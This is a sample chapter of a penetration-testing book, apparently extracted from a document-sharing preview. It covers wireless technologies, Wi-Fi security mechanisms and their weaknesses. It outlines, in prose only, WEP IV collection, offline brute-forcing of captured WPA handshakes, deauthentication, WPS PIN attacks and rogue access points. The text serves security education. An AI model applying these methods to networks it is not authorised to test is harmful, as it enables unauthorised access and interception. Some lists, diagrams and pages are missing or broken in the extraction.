Академический Документы
Профессиональный Документы
Культура Документы
$ 44.99 US
28.99 UK
"Community
Experience
Distilled"
Vyacheslav Fadyushin
Andrey Popov
C o m m u n i t y
D i s t i l l e d
E x p e r i e n c e
Vyacheslav Fadyushin
Andrey Popov
penetration tester with more than 9 years of professional experience and a diverse
background in various aspects of information security.
His main points of interest and fields of expertise are ethical hacking and penetration
testing, infrastructure and application security, mobile security, and information
security management.
He is also an author of the book, Penetration Testing: Setting Up a Test Lab How-to,
published by Packt Publishing in 2013.
Andrey Popov is a security consultant and penetration tester with rich professional
experience and a diverse background in infrastructure and application security,
information security management, and ethical hacking. He has been working for a
market-leading company along with another security professional since 2007.
Preface
Building a Pentesting Lab for Wireless Networks is a practical guide to building a
penetration testing lab, accessible via Wi-Fi, which contains vulnerable components
and at the same time secured from unauthorized external access. This book is
intended for people learning ethical hacking and for security professionals who are
responsible for penetration testing and maintaining security in their organization
who wish to learn how to build a penetration testing lab for wireless networks.
The fact that the lab is secured from external access allows readers to use it both in
corporate and home networks without putting themselves at risk. Thus, the book
will be useful not only for people new to information security but also for security
professionals who want to shift their expertise to the ethical hacking field. You will
learn how to plan your lab, fill it with components, configure them, and secure the
environment. Additionally, you will get an overview of the most popular hacking
frameworks and toolsets and will be able to prepare your own wireless hacking
platform on a Linux laptop or a virtual machine.
Preface
Chapter 4, Designing Application Lab Components, shows you how to fill your lab with
useful components, which actually bring sense to the whole story of building a lab
network. We install the most common services that you are most likely to meet in
the scope of a commercial penetration testing project and which you most probably
would like to be able to hack.
Chapter 5, Implementing Security, shows our readers how to protect the lab network
from unauthorized access and external attacks by installing and configuring
network- and host-based security solutions. Additionally to securing the lab
network, we prepare it for practicing important penetration testing topics, such as
bypassing and evading security mechanisms and assessing their effectiveness.
Chapter 6, Exploring Hacking Toolkits, gives you an overview of several popular
toolkits used in numerous hacking tasks and projects, along with examples of their
utilization in the lab environment. It helps you get a brief understanding of their
capabilities and a foundation for further learning.
Chapter 7, Preparing a Wireless Penetration Testing Platform, shows you how to prepare
a penetration testing platform for wireless hacking, including the basic necessary
tools. Additionally, the chapter explains how to choose a Wi-Fi interface suitable for
penetration testing.
Chapter 8, What's Next?, gives you some hints regarding what to start with and in
which direction to dig if you want to develop ethical hacking skills and become a
professional penetration tester.
Understanding Wireless
Network Security and Risks
In this chapter, we are going to review which wireless technologies allow data
transfer, focusing on the Wi-Fi technology as the most important one for building
our own penetration testing lab. As it is a very important topic for building a
highly secure lab, we will also review the common Wi-Fi security mechanisms
and their security risks in conjunction with an overview of the typical wireless
attack methodology.
In this chapter, we will cover the following topics:
In the case of wireless networks, there is an open environment used with almost
complete lack of control. Providing the security level equivalent to physical security
in wired networks is not that easy nowadays. Wireless network segments can
become available from another floor of the same building, neighboring buildings,
or even outsideonly signal strength limits physical borders of a wireless network.
Therefore, unlike wired networks where connection points are known, a wireless
network can be accessed from anywhereas long as the signal is strong enough.
Topology:
Point-to-point
Point-to-multipoints
Use cases:
Corporate infrastructure: Office and technological
Providing a service
Personal usage
Range:
Wireless personal area networks (WPAN): Bluetooth, IrDA,
and RFID
Wireless local area networks (WLAN): Wi-Fi
Wireless metropolitan area networks (WMAN) and wireless wide
area networks (WWAN): WiMAX, GSM, and UMTS
Speed:
1 Mbit/s for WPAN
54 Mbit/s for WLAN
300 Mbit/s for WMAN
15 Mbit/s for WWAN
[2]
Chapter 1
A brief but very capacious way of mapping the two most important characteristics of
wireless technologies (the data transmission speed and the range) is depicted in the
following diagram:
The classification of wireless communications based on range and data transfer speed
As we now have a clear definition, we can proceed to look at some of the types of
wireless data transfer technologies and their specifics.
Let's start with the mobile cellular communication, which is probably the most
common type of wireless data transmission nowadays. Cellular communication is
a mobile networka type of mobile communication that is based on the cellular
network. The key feature is that the overall coverage area is divided into cells. Cells
partially overlap and together form a network. A network comprises separate base
stations operating in the same frequency band and each covering its own area (cell)
with a radio signal and switching equipment. Cells have unique IDs allowing to
determine the current locations of subscribers and provide connection continuity
when a person is moving from a coverage area of one base station into a range of
another one.
The history of mobile communications began in the middle of the 20th century and
has passed four major milestones in its development until and the present time:
Currently, the most forward-looking solutions are UMTS and LTE. Both data
transmission standards have been inherited from GSM and allow us to transmit
voice or data and provide a set of various services. The distinctive feature of these
standards compared with the older generations is the ability to transfer data at a
higher speed (up to 21 Mbit/s for incoming data in case of UMTS and up to 300
Mbit/s for incoming data in case of LTE). These speeds allow working on the
Internet in comfortable conditions.
[3]
Since there is a large amount of existing standards and a lot of differences between
the government requirements, various frequencies for data transmission and
information protection techniques based on different encryption algorithms
can be used in different countries and industries.
The next wireless technology that we are going to review is Bluetooth (representative
of WPAN). Bluetooth allows information exchange between personal devices such as
mobile phones, personal computers, tablets, input devices (microphones, keyboards,
and joysticks), and output devices (printers and headsets). Bluetooth operates in
the free and widely available radio frequencies (between 2.4 to 2.485 GHz) for
short-range communication at a distance of typically up to 10 meters (but there are
exceptions) between devices and supports two types of connection: point-to-point
and point-to-multipoint.
Bluetooth has a multilevel architecture consisting of the main protocol and a set of
auxiliary protocols that implement the following:
Creating a virtual serial data stream and emulating RS-232 control signals
TCP/IP
[4]
Chapter 1
This technology became especially popular in the late 1990s. Nowadays, it has almost
entirely replaced by more modern methods of communication such as Wi-Fi and
Bluetooth. But it is still used in remote controllers of home appliances and usually
these devices have one-way connection (one side has an emitter only and the other
side has a receiver only).
The main reasons for the rejection of IrDA were the following:
Low speed of data transmission (in the later revisions of the standard, speed
was increased but even the high-speed versions are not popular now)
Another example of wireless optics as data transmission is Free Space Optics (FSO).
This exotic technology uses an infrared laser as the information carrier, and it is used
for long-distance communications in open spaces. The disadvantage of this system,
as in the case of IrDA, is the direct visibility requirement that is highly dependent
on weather.
Usually FSO is used:
When you require a private link that is not receptive to radio interference
and does not create any (for example, at airports)
Going back to wireless data transmission using a radio signal, we need to review the
IEEE 802.11 standards family, also known as Wi-Fi (Wi-Fi is a trademark of Wi-Fi
Alliance for wireless networks based on IEEE 802.11 standards family).
The family of IEEE 802.11 contains a few dozen standards, but we will directly take a
look at the ones designed for data transmission, omitting the auxiliary ones:
802.11a: This is the standard approved in 1999 and used since 2001. This
standard allows us to work at 5 GHz frequency with 54 Mbit/s speed.
802.11g: This allows us to transfer data at 2.4 GHz frequency with 54 Mbit/s
speed. It was approved in 2003.
802.11n: This was approved in 2009. This standard increases the speed of
data transmission up to 600 Mbit/s at 2.4 to 2.5 GHz or 5 GHz frequencies.
The standard is backwards-compatible with 802.11 a/b/g.
[5]
802.11ac and 802.11ad: These standards were approved in 2014. They allow
data transfer at the speed up to 7 Gbit/s and have additional working
frequency (60 GHz).
IEEE 802.11 is used for data transmission via radio within a range of 100 meters.
Typically, the IEEE 802.11 network consists of at least one access point and at least
one client, but it is possible to connect two clients in a point-to-point (ad hoc) mode.
In case of point-to-point connection, the access point is not used and clients are
connected directly to each other.
Due to the fact that IEEE 802.11 applies to WLAN and provides high-speed data
transfer for a local area, solutions based on IEEE 802.11 are ideal to solve "the last
mile" problem. IEEE 802.11 allows us to reduce costs of deploying and expanding
local networks and also provides network access in difficult-to-reach places, such as
outdoors or inside buildings that have historical value.
[6]
Chapter 1
The second threat is problems in settings of network devices, such as using weak
encryption keys or authentication methods with known vulnerabilities. Potential
attackers primarily exploit these disadvantages. Incorrectly configured access points
may become the cause of breaking into an entire corporate network. In addition,
in the case of a corporate network, it is difficult to track using unauthorized access
points; for example, a typical employee can bring an unregistered access point
and connect it to a corporate network. This creates a serious threat not only to the
wireless network, but also to the entire company's infrastructure.
Incorrectly configured wireless clients are an even greater threat than incorrectly
configured access points. Such devices are on the move and often they are not
specifically configured to reduce the risk or use default settings.
Following the previous point, the next threat is breaking the encryption. Attackers
are well informed about the flaws of the widely used encryption algorithms, and for
example, in the case of the WEP protocol, they can retrieve a pre-shared key from a
client in less than 10 minutes.
The fourth threat facing wireless networks is the difficulty in tracking actions of a
user. As already noted, the wireless devices are not "tied" to the network and can
change their point of connection to the network. Incorrectly configuring the wireless
client can automatically connect to the nearest wireless network. This mechanism
allows attackers to switch the unsuspecting user host on an attacker's device instead
of a legitimate access point to perform vulnerability scanning, phishing attacks, or
man-in-the-middle attacks. Furthermore, if a user simultaneously connects to a wired
network, it becomes a convenient entry point to a corporate network.
Impersonating a user is a serious threat to any network, not just wireless. However,
in the case of wireless communication, determining the authenticity of the user is
more difficult. There are network identifiers (SSID) and filtering MAC addresses
in place, but both are broadcasted in clear text in service packets and can be
intercepted. Impersonation allows attackers to insert wrong frames to authorized
communications and carry out an attack on a corporate infrastructure.
The fact that many laptop users prefer switching to WLANs if they are dissatisfied
with the quality of the wired network service (weak connection, URL-filtering, or
port-filtering) increases the risk. In most cases, operating systems do it automatically
when a wired network is down.
[7]
The last threat that we would like to mention is Denial of Service (DoS). The aim
of a typical DoS attack is the violation of network service availability or a complete
blocking of an authorized client access. Such an attack can be carried out, for
example, by flooding a network with de-authentication or "junk" packets sent from
a spoofed address. Tracking an attack source in this case is not an easy task. In
addition, there is a possibility to organize a DoS attack on the physical level, running
a fairly powerful jammer in the special frequency range.
[8]
Chapter 1
[9]
The standard also introduces error corrections and the possibility to work in
conditions of strong interference and weak signal. For this purpose, the standard
describes automatic methods of data transmission speed modification based on
current signal strength and interference. The development of the Wi-Fi technology
has drastically increased the number of different wireless devices in the world and
created the problem of interference and congestion at the 2.4 GHz band due to the
fact that such devices as microwave ovens, mobile phones and Bluetooth equipment
noticeably influence each other.
The 802.11a standard (operating on a 5 GHz frequency band) was developed to
unload the 2.4 GHz band. There are fewer sources of interference in the new range
comparing to the 2.4 GHz band and the average level of noise is much lower. The
802.11a standard uses two basic frequencies around 5 GHz and a maximum data
transfer rate of up to 54 Mbit/s.
It should be mentioned that the 5 GHz band is adjacent to the frequencies that are
partly used for satellite and microwave communications. To eliminate interference
between Wi-Fi equipment and the other departmental systems, the European
Telecommunications Standards Institute (ETSI) has developed two additional
protocols: Dynamic Frequency Selection (DFS) and Transmit Power Control (TPC).
Wi-Fi devices can automatically change frequency channels or decrease transmission
power in the case of conflict on the carrier frequencies using these protocols.
The next step in the development of Wi-Fi is the standard 802.11g, approved in 2003.
802.11g is an improved version of 802.11b and is designed for devices operating at
frequencies of 2.4 GHz with a maximum speed of 54 Mbit/s.
Now, the 802.11n standard has become the most widely used Wi-Fi technology. The
developers have attempted to combine all the good features that were implemented
in the previous versions in this new one. The 802.11n standard is designed for
equipment operating at center frequencies of 2.4 GHz to 5 GHz as quickly as
possible up to 600 Mbit/s. This standard was approved by the IEEE in September
2009. The standard is based on the technology of MIMO-OFDM. In IEEE, the
maximum data rate of 802.11n is several times greater than the previous ones. This is
achieved by doubling the width of the channel from 20 MHz to 40 MHz and due to
implementation of MIMO technology with multiple antennas.
The last standard, which is rapidly gaining popularity, is 802.11ac. It is a wireless
network standard adopted in January 2014. It operates in the 5 GHz frequency band
and is backward compatible with IEEE 802.11n.
This standard allows us to significantly expand the network bandwidth from
433 Mbit/s to 6.77 Gb/s at an 8x MU-MIMO-antenna. This is the most significant
innovation with respect to IEEE 802.11n. In addition, significantly less energy is
used, which extends the battery life of mobile devices.
[ 10 ]
Chapter 1
Frequencies, MHz
Channels
Speeds,
Mbit/s
Power, mW
802.11
2400-2483,5
20
1; 2
100
802.11b
2400-2483,5
13
1; 2; 5,5;
11; 22
100
5150-5350
20
6; 9; 12;
100
18; 24; 36; 1000
48; 54; 108
802.11a
5650-6425
802.11g
2400-2483,5
13
1; 2; 5,5; 6; 250
9; 11; 12;
18; 22; 24;
33; 36; 48;
54; 108
802.11n
2400-2483,5
150
5150-5350
100
5650-6425
802.11ac
5170-5905
250
1000
433
500
Hiding SSID
Let's start with one of the common mistakes made by network administrators: relying
only on security by obscurity. In the frames of the current subject, it means using a
hidden WLAN SSID (short for service set identification) or simply a WLAN name.
Hidden SSID means that a WLAN does not send its SSID in broadcast beacons
advertising itself and doesn't respond to broadcast probe requests, thus making
itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means
that normal users do not see the WLAN in their available networks list.
[ 11 ]
But the lack of WLAN advertising does not mean that an SSID is never transmitted
in the airit is actually transmitted in plaintext with a lot of packets between
access points and devices connected to them, regardless of the security type used.
Therefore, SSIDs are always available for all the Wi-Fi network interfaces in a range
and are visible to any attacker using various passive sniffing tools.
MAC ltering
To be honest, MAC filtering cannot even be considered as a security or protection
mechanism for a wireless network, but it is still called so in various sources. So let's
clarify why we cannot call it a security feature.
Basically, MAC filtering means allowing only those devices that have MAC
addresses from a pre-defined list to connect to a WLAN, and not allowing
connections from other devices. MAC addresses are transmitted unencrypted in
Wi-Fi and are extremely easy for an attacker to intercept without even being noticed
(refer to the following screenshot):
[ 12 ]
Chapter 1
WEP
Wired equivalent privacy (WEP) was born almost 20 years ago at the same time
as the Wi-Fi technology and was integrated as a security mechanism for the IEEE
802.11 standard.
As often happens with new technologies, it soon became clear that WEP contained
weaknesses in design and was unable to provide reliable security for wireless
networks. Several attack techniques were developed by security researchers that
allowed them to crack a WEP key in a reasonable amount of time and use it to
connect to a WLAN or intercept network communications between WLAN and
client devices.
Let's briefly review how WEP encryption works and why is it so easy to break.
WEP uses so-called initialization vectors (IV) concatenated with a WLAN's shared
key to encrypt transmitted packets. After encrypting a network packet, an IV is
added to a packet as it is and sent to a receiving side, for example, an access point.
This process is depicted in the following flowchart:
Wi-Fi Device
Access Point
Key
Key
IV Generation
IV
IV
KEY
RC4
Clear text
CRC Generation
Clear text
IV
CRC
KEY
RC4
Cipher text
+
wireless
transfer
[ 13 ]
Clear text
CRC
An attacker just needs to collect enough IVs, which is also a trivial task using
additional reply attacks to force victims to generate more IVs.
Even worse, there are attack techniques that allow an attacker to penetrate WEPprotected WLANs even without connected clients, which makes those WLANs
vulnerable by default.
Additionally, WEP does not have a cryptographic integrity control, which also
makes it vulnerable to attacks on confidentiality.
There are numerous ways an attacker can abuse a WEP-protected WLAN,
for example:
Decrypt network traffic using active attacks (reply attack, for example)
Although WEP was officially superseded by the WPA technology in 2003, it can still
be sometimes found in private home networks and even in some corporate networks
(mostly belonging to small companies nowadays).
But this security technology has become very rare and will not be used in future,
largely due to awareness in corporate networks and because manufacturers no
longer activate WEP by default on new devices.
In our humble opinion, device manufacturers should not include WEP support in
their new devices to avoid its usage and increase their customers' security.
From the security specialist's point of view, WEP should never
be used to protect a WLAN, but it can be used for Wi-Fi security
training purposes.
Regardless of the security type in use, shared keys always add
an additional security risk; users often tend to share keys, thus
increasing the risk of compromising the key and reducing
accountability for key privacy.
Moreover, the more devices use the same key, the greater
the amount of traffic becomes suitable for an attacker during
cryptanalytic attacks, increasing their performance and chances of
success. This risk can be minimized by using personal identifiers
(key, certificate) for users and devices.
[ 14 ]
Chapter 1
WPA/WPA2
Due to numerous WEP security flaws, the next generation of Wi-Fi security
mechanisms became available in 2003: Wi-Fi Protected Access (WPA). It was
announced as an intermediate solution until WPA2 became available and
contained significant security improvements over WEP.
Those improvements include:
Stronger encryption: The new standards use longer encryption keys than
WEP (256-bit versus 64- and 128-bit) and became capable of utilizing the
Advanced Encryption Standard (AES) algorithm.
The support for the cryptographically strong AES algorithm was implemented in
WPA, but it was not set as mandatory, only optional.
Although WPA was a significant improvement over WEP, it was a temporary
solution before WPA2 was released in 2004 and became mandatory for all new
Wi-Fi devices.
WPA2 works very similarly to WPA and the main differences between WPA and
WPA2 are in the algorithms used to provide security:
AES became the mandatory algorithm for encryption in WPA2 instead of the
default RC4 in WPA
TKIP used in WPA was replaced by Counter Cipher Mode with Block
Chaining Message Authentication Code Protocol (CCMP)
Because of the very similar workflows, WPA and WPA2 are also vulnerable to the
similar or the same attacks and are usually known as and written as one word,
WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK)
or personal mode and enterprise mode.
[ 15 ]
Access Point
Passphrase (PSK)
distribution
SSID
PSK
PMK
Derive PTK
Check MIC
PSK
4-way handshake
nce,
A-no e 1)
ag
s
s
(Me
S-nonce,
Message Integrity Code
IC
(Message 2) ll Key, M
a
t
)
s
3
n
I
sage
(Mes
Key installe
d, MIC
(Message
4)
Key installed
Begin
Encryption
SSID
PMK
Derive PTK
Check MIC
Key installed
Check MIC
cipher text
Begin
Encryption
The main WPA/WPA2 flaw in PSK mode is the possibility to sniff a whole 4-way
handshake and to brute force a security key offline without any interaction with a
target WLAN. Generally, the security of a WLAN mostly depends on the complexity
of the chosen PSK.
[ 16 ]
Chapter 1
Computing a PMK (short for primary master key) used in 4-way handshakes (refer
to the handshake diagram) is a very time-consuming process compared to other
computing operations and computing hundreds of thousands of them can take a
very long time. But in the case of a short and low complexity PSK being in use, a
brute-force attack does not take long even on a not-so-powerful computer. If a key is
complex and long enough, cracking it can take much longer, but still there are ways
to speed up this process:
Using powerful computers with CUDA (short for Compute Unified Device
Architecture), which allows a software to directly communicate with GPUs
for computing. As GPUs are natively designed to perform mathematical
operations and do them much faster than CPUs, the process of cracking
works several times faster with CUDA.
Using rainbow tables that contain pairs of various PSKs and their
corresponding precomputed hashes. They save a lot of time for an attacker
because the cracking software just searches for a value from an intercepted
4-way handshake in rainbow tables and returns a key corresponding to
the given PMK if there was a match, instead of computing PMKs for every
possible character combination. Because WLAN SSIDs are used in 4-way
handshakes analogous to a cryptographic salt, PMKs for the same key will
differ for different SSIDs. This limits the application of rainbow tables to a
number of the most popular SSIDs.
Using cloud computing is another way to speed up the cracking process, but
it usually costs additional money. The more computing power an attacker
can rent (or get through another ways), the faster the process is. There are
also online cloud-cracking services available on the Internet for various
cracking purposes including cracking 4-way handshakes.
Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater
the risk of compromisethat's why it is also not an option for big complex
corporate networks.
WPA/WPA2 PSK mode provides the sufficient level of security for home
and small office networks only when a key is long and complex enough
and is used with a unique (or at least not popular) WLAN SSID.
[ 17 ]
Enterprise mode
As already mentioned in the previous section, using shared keys poses a security
risk and in the case of WPA/WPA2 highly relies on a key length and complexity.
But there are several factors in enterprise networks that should be taken into
account when talking about WLAN infrastructure: flexibility, manageability,
and accountability.
There are various components that implement those functions in big networks, but
in the context of our topic, we are mostly interested in two of them: AAA (short for
authentication, authorization, and accounting) servers and wireless controllers.
WPA-Enterprise or 802.1x mode was designed for enterprise networks where a high
security level is needed and the use of an AAA server is required. In most cases,
a RADIUS server is used as an AAA server and the following EAP (Extensible
Authentication Protocol) types are supported (and several more, depending on a
wireless device) with WPA/WPA2 to perform authentication:
EAP-TLS
EAP-TTLS/MSCHAPv2
PEAPv0/EAP-MSCHAPv2
PEAPv1/EAP-GTC
PEAP-TLS
EAP-FAST
RADIUS
Protocol
802.1x
cable
Initiate
connection
Identity request
Access
Point
RADIUS
Server
Identity response
Identity
Authentication
result
Port authorized OR
disconnect
WPA-Enterprise authentication
[ 18 ]
Chapter 1
WPS
Wi-Fi Protected Setup (WPS) is actually not a security mechanism, but a key
exchange mechanism which plays an important role in establishing connections
between devices and access points. It was developed to make the process of
connecting a device to an access point easier, but it turned out to be one of the
biggest holes in modern WLANs if activated.
WPS works with WPA/WPA2-PSK and allows devices to connect to WLANs with
one of the following methods:
Push button: Special buttons should be pushed on both an access point and a
client device during the connection phase. Buttons on devices can be physical
and virtual.
NFC: A client should bring a device close to an access point to utilize the
Near Field Communication technology.
[ 19 ]
Because WPS PINs are very short and their first and second parts are validated
separately, an online brute-force attack on a PIN can be done in several hours
allowing an attacker to connect to a WLAN.
Furthermore, the possibility of offline PIN cracking was found in 2014, which allows
attackers to crack pins in 1 to 30 seconds, but it works only on certain devices.
You should also not forget that a person who is not permitted to connect to a WLAN
but who can physically access a Wi-Fi router or access point can also read and use a
PIN or connect via the push button method.
[ 20 ]
Chapter 1
[ 21 ]
WPA-PSK attacks
As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't
differan attacker needs to sniff a 4-way handshake in a moment, establishing a
connection between an access point and an arbitrary wireless client and brute forcing
a matching PSK. It does not matter whose handshake is intercepted, because all
clients use the same PSK for a given target WLAN.
Sometimes, attackers have to wait long until a device connects to a WLAN to
intercept a 4-way handshake and of course they would like to speed up the
process when possible. For that purpose, they force an already connected device to
disconnect from the access point sending control frames (deauthentication attack) on
behalf of a target access point. When a device receives such a frame, it disconnects
from the WLAN and tries to reconnect again if the "automatic reconnect" feature is
enabled (it is enabled by default on most devices), thus performing another 4-way
handshake that can be intercepted by an attacker.
Another possibility to hack a WPA-PSK protected network is to crack a WPS PIN if
WPS is enabled on a target WLAN.
[ 22 ]
Chapter 1
From a user perspective, being attacked in such way looks like just being unable to
connect to a WLAN for an unknown reason and could even be not seen if a user is
not using a device at that moment and is just passing by a rogue access point. It is
worth mentioning that classic physical security or wireless IDPS solutions are not
always effective in such cases. An attacker or a penetration tester can install a rogue
access point outside of the range of a target WLAN. It will allow the hacker to attack
user devices without the need to get into a physically controlled area (for example,
an office building), thus making the rogue access point unreachable and invisible for
wireless IDPS systems. Such a place could be a bus or train station, parking lot, or a
caf where a lot of users of a target WLAN go with their Wi-Fi devices.
Unlike WPA-PSK with only one key shared between all WLAN users, the Enterprise
mode employs personified credentials for each user whose credentials could be more
or less complex depending only on a certain user. That is why it is better to collect
as many user credentials and hashes as possible, thus increasing the chances of
successful cracking.
Summary
In this chapter, we reviewed which wireless technologies are used to transfer data
and especially highlighted the Wi-Fi technology as the technology that we will
employ to provide network access to our penetration testing lab.
During our journey through this chapter, we also looked at the security mechanisms
that are used to secure access to wireless networks, their typical threads, and
common misconfigurations that lead to security breaches and allow attackers to
harm corporate and private wireless networks.
The brief attack methodology overview has given us a general understanding of
how attackers normally act during wireless attacks and how they bypass common
security mechanisms by exploiting certain flaws in those mechanisms.
We also saw that the most secure and preferable way to protect a wireless
network is to use WPA2-Enterprise security along with a mutual client and server
authentication, which we are going to implement in our penetration testing lab.
Now, we are ready to proceed with building a wireless lab protected from the flaws
listed previously. In the next chapter, we are going to help you to first determine the
tasks that a lab should fulfill for you and then we will guide you through the whole
lab planning process. The guidance is organized in such a way that you can decide
which lab components and technologies you need to implement based on your
own requirements.
[ 23 ]
www.PacktPub.com
Stay Connected: